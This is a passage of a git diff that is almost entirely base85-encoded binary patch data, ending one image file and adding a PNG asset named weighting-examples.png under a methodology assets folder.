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

literal 0
HcmV?d00001

diff --git a/src/assets/methodology/weighting-examples.png b/src/assets/methodology/weighting-examples.png
new file mode 100644
index 0000000000000000000000000000000000000000..e51b3801257ce168437a56e3e2721d8c965386b9
GIT binary patch
literal 76032
zcmdqJRaBhYwk`?;Dcmi%2Y1&XAp{TZ9)f$Jg#`B`1b24}?p_25?ry=|DeM+=ue0}F
zYtD8b&%@z`M*V*c>Ejz+zfQP{k}NvPYZMq57<9S!(jQ@9UO`}B;9vlV&`-FM2(6*N
zU|l}SO2Sl(knTbMfOnCUQwKnQd;sQQFff!ba?)?rJq!=ikvvFb7WyqUzo-5fgA4d-
zDxZyj1E<6i3PZTxH6G(jN*A;uc|vw9u(sx(OTpSXzMe};`e%)jl&)Til9sl%k(R19
z=)3gy$Xel5znO&A7F{`Jou3x>%R2$I6Nf)mhby+lFWOHW-w|R{!b$rBuwbbr;KN}4
z`wtFdz$xq`jy2%FKl!)Eo$q%iDgXJ4{(!Gz6cXujid6qJu7qSJ_9e{83bZ0_sH)rGJ*u!ux`MeA+X*?WTkXew}Q
zMp-kLB(y;u+)L^mJ1}J;lm51|8i~rbbM|s{FNMlq}+zawxSXw%@D)9C`Z)30OdH2Q2oulho
zR?LQoFgAqbfPGgkV}405N^+G1urf?6{tmGHD%Q_wTZnt=c0G2!wzQ-03eh^&Lb7ae
z69~9AZ)|!BCEwxx#r>udZKhfO0kJg{xSi$~a5EUa4sMo3#3iWg0J?*F`9$q&u*5gp
zAfIC|ve8i9`Um+^6@AQ*&O(BJzk35izWf0`Ou`B0^e)hdW2E6d0N6F{Z;+E3lXb=1AyuG4s;?XqGzt77&j984R85G_wh`ee!?rP23eCIQkc
znLskyG8g1~mz2WD)^MI(eT1czXe_%Iva+ViVqvUxWHV)9t9+1)Z0DR;yq=q}%{_P0
z?*c*0m^?O6r1C{~dqXqF?_wOxEx;Bva6dkQ>$Rjy)sDtH?J&RT^CnOdi!$2?Q1XKT
zdlwdZ8lwKP4LGpWDrxW>)xKD`2b)oKkyZ;McE8b2@=H07@8NG0c?!nW&+gyLKg#c&
zlo|lCGv~^?V+>f9UK@mhgxNp7mn=GAE;Pv0D~M}P=BP%ucgk9`sp5h^}G;tadCw%d(U@oZL
zHm+;BL*Q#KtFS3v~ZO81_~EK>MKd4%1}J?CP;(4W
z-QSROXI@(h!_2vfk>K9yDXv;Am}GBgK1Fy@Q1Z$@<1yHjiYc
z-hMk9(F=6TQ5S%xnsAw?FgD~*Dx&O9F3w~dTjr7Yd`XK;S@kE+h_FqzEkSxi_lADD
z+&>i7w(<&Uem&|1sc|ltk@b8d1{t@$TR+aZ=<376LvbFH>xL7%#+oak+Wv=ztL^6x
z4YtQ0AM~RAG=)lp))>zeCU{u0-h9Z#@^NY`esxTFk&`^1qIL_mZ^$n2{33AeKvHEN
